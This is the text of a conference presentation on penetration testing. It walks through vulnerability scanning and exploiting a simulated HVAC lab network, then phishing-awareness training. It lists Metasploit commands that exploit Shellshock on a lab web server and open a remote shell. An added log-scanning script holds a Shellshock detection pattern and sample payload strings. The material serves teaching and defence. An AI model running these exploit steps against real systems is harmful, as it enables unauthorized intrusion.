ANATOMY OF A PENTEST:
PROACTIVE STEPS TO ADDRESS
VULNERABILITIES IN YOUR NETWORK
Presenter: Robbie Corley
Robbie.Corley@KCTCS.EDU
Organization: KCTCS
Senior Information Security Analyst
Personal Life / Interests
• Married
• Bachelor’s in Music Business???
• Favorite Show: Seinfeld
• Favorite Movie(s): Lord of the Rings / Hobbit Trilogy
• Favorite Aspects of IT Security:
• Reverse Engineering / Studying Shellcode
• Finding and Exploiting Software Vulnerabilities
ABOUT ME
What is a pentest?
• A pentest is a simulated attack against a system to
prove or disprove the existence of vulnerabilities
previously detected by a vulnerability scan.
How does it work?
• You are the attacker:
• You will use exploits custom tailored to target
specific flagged vulnerabilities from your
previous vulnerability scan
LET’S TALK ABOUT PENTESTING
Some history on Pentesting…
• Pentesting originally required manually compiling each individual exploit
to test a vulnerability, all of which were usually coded in different
programming languages and specific to OS builds (XP sp1, XP sp2, etc)
What’s the advantage over a Vulnerability Scan and why conduct one?
• A Vulnerability Scan merely lays out the foundation for your
network risk assessment
• A Pentest helps you fortify your network by discovering and
patching security holes before the attackers do and keeps your
auditors happy, which also keeps your boss happy 
• Pentesting “weeds out” false positives from a Vulnerability Scan
while also validating vulnerabilities
LET’S TALK ABOUT PENTESTING
• Our Goal: To Scan and Validate vulnerabilities in a simulated environment to
demonstrate the effectiveness of a Pentest
• Recommended Vendor: Rapid7 (approved PCI scan vendor, an added plus)
• Other recommendations: Tenable Nessus
• Open Source: OpenVAS
• Why Rapid7?
• Exploits are pre-compiled and you do not need to go online to search for them.
Readily available, built into the software
• Scanner and Pentesting software both free to try
• Software Resources Used:
• Nexpose Vulnerability Scan Solution
• Metasploit Pentesting Solution
CONDUCTING YOUR FIRST PENTEST
• Breakdown: Your boss has requested a blind vulnerability/pentest
assessment for your HVAC network
• Attack Vectors used: Client Side and Web
• A Blind Scan?
• A blind scan/pentest is when you scan/pentest a network without using
known credentials. This helps to mimic a realistic cyber attack scenario
• HVAC Network Layout:
• HVAC A: Windows XP for server HVAC software:
• 192.168.56.101
• HVAC B: Linux Web Server for HVAC Web Services
• 192.168.56.102
HVAC SYSTEM SCAN & PENTEST
SIMULATION
HVAC SERVER A: SCAN SIMULATION
Vulnerability Scan Results using
HVAC A:
IP: 192.168.56.101
OS: Windows XP
HVAC CONSOLE SERVER
HVAC SERVER A: PENTEST SIMULATION
Pentest Live Demo using
HVAC A:
IP: 192.168.56.101
OS: Windows XP
HVAC CONSOLE SERVER
HVAC SERVER B: SCAN SIMULATION
Vulnerability Scan Results using
HVAC B:
IP: 192.168.56.102
OS: Linux
HVAC WEB SERVER
Shellshock!!!!!!
HVAC SERVER B: PENTEST SIMULATION
Pentest Live Demo using
HVAC B:
IP: 192.168.56.102
OS: Linux
HVAC WEB SERVER
PENTEST SHELL COMMANDS USED
Commands used for future reference:
To pull up the web console, press Alt + Tilde (“~”), then…
• “use exploit/multi/http/apache_mod_cgi_bash_env_exec”
• “set RHOST 192.168.56.102” (our victim box ip address)
• “set TARGETURI /cgi-bin/status” (path to vulnerable cgi-script)
• “set PAYLOAD linux/x86/meterpreter/bind_tcp” (exploit module)
• “run”
Once in the compromised victim machine’s session, you can open a
shell by simply typing “shell”. You will then be greeted with a Linux shell
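The defender's side of the demo above, as an added example that is not part of the original presentation: a log check that flags requests carrying the bash function-definition prefix Shellshock relies on, and marks those aimed at CGI paths such as the /cgi-bin/status script used here. It assumes Apache's "combined" access log format; the log lines and the 192.168.56.50 source address are constructed sample data.

```python
import re

# Apache "combined" format:
# host ident user [time] "request" status bytes "referer" "user-agent"
# Quoted fields may contain backslash-escaped quotes, which Apache writes as \"
COMBINED = re.compile(
    r'(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)

# Shellshock input begins with a bash function definition: "() {"
FUNC_DEF = re.compile(r'\(\)\s*\{')

# Constructed sample log lines (not taken from the presentation)
SAMPLE_LOG = r'''
192.168.56.1 - - [12/Oct/2014:10:01:02 -0400] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.56.50 - - [12/Oct/2014:10:03:17 -0400] "GET /cgi-bin/status HTTP/1.1" 200 0 "-" "() { :;}; /bin/true"
192.168.56.50 - - [12/Oct/2014:10:03:40 -0400] "GET /index.html HTTP/1.1" 200 1024 "() { :; }; /bin/true" "curl/7.38.0"
this line is truncated and cannot be parsed
'''.strip().splitlines()


def find_shellshock_attempts(lines):
    """Return (hits, unparsed): flagged requests and lines that did not parse."""
    hits, unparsed = [], []
    for line in lines:
        m = COMBINED.match(line)
        if not m:
            # Keep malformed lines for manual review instead of dropping them
            unparsed.append(line)
            continue
        parts = m.group("request").split()
        path = parts[1] if len(parts) > 1 else ""
        for field in ("request", "referer", "agent"):
            if FUNC_DEF.search(m.group(field)):
                hits.append({
                    "host": m.group("host"),
                    "time": m.group("time"),
                    "path": path,
                    "field": field,
                    "status": int(m.group("status")),
                    # CGI scripts receive header values as environment
                    # variables, so these hits deserve attention first
                    "cgi_target": path.startswith("/cgi-bin/"),
                })
    return hits, unparsed


if __name__ == "__main__":
    hits, unparsed = find_shellshock_attempts(SAMPLE_LOG)
    # List CGI-targeted attempts before the rest
    for h in sorted(hits, key=lambda h: not h["cgi_target"]):
        level = "HIGH" if h["cgi_target"] else "low"
        print(f'[{level}] {h["time"]} {h["host"]} -> {h["path"]} '
              f'({h["field"]} field, HTTP {h["status"]})')
    print(f"{len(unparsed)} line(s) could not be parsed")
```

The combined format records only the request line, Referer and User-Agent, so an attempt carried in any other header will not appear in this log.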

• Why have User Awareness Training?
• Users can be more mindful of simple operations that can effectively
help keep their documents and data safe
• We simply cannot monitor all of our users’ actions
• Hackers are keen on well-structured network security, and seek out
easier pathways of entry, e.g., a phishing email directed to an
unsuspecting, untrained user
• On a personal note: Training gives our users a boost of confidence,
knowing they are collectively making a difference in keeping themselves
and the company more secure
USER AWARENESS TRAINING
PENTESTING USING SOCIAL
ENGINEERING MODULES
• How does it work?
• Phishing Modules use pre-made email templates
that resemble common Phishing emails in the wild
• Emails can be tailored to re-direct users to
informative phishing awareness videos upon the
user interacting with a phishing email
• What tools do I need?
• Easiest solution and what we will be using:
SPTOOLKIT
• SPTOOLKIT is open source and requires little
effort to set up
• Rapid7’s Metasploit Pentesting Software also
includes a Social Engineering module with a pro
license
USER AWARENESS TRAINING
PENTESTING USING SOCIAL
ENGINEERING PHISHING MODULES
• Demo time!
• Link: https://github.com/sptoolkit/sptoolkit
• Requirements:
• SMTP server
• Any Linux OS box with Apache and
MySQL installed
• Recommended approach: Install
Kali Linux, which has Apache and
MySQL installed and enabled by
default
• http://www.kali.org/downloads/
• Commands to start MySQL and Apache:
• service apache2 start
• service mysql start
USER AWARENESS TRAINING
PHISHING AROUND WITH SPTOOLKIT
THAT’S ALL FOLKS
This presentation and its supplemental video and software content
can be downloaded by using the following link:
http://tinyurl.com/l46flvo (Secure Google-Drive repository)
Links to Resources outside of this repository:
SPTOOLKIT Setup Guide:
http://www.dafthack.com/blog/howtospearphishyouremployeespart1thesetup
www.rapid7.com -> download Community edition of Metasploit and Nexpose
http://www.kali.org/downloads/ -> Kali Linux to be used as a pentesting
environment and for SPTOOLKIT Social Engineering Module
Want to chat with me outside of this conference about more IT Security topics?
Shoot me an email at:
Robbie.Corley@kctcs.edu
QUESTIONS???
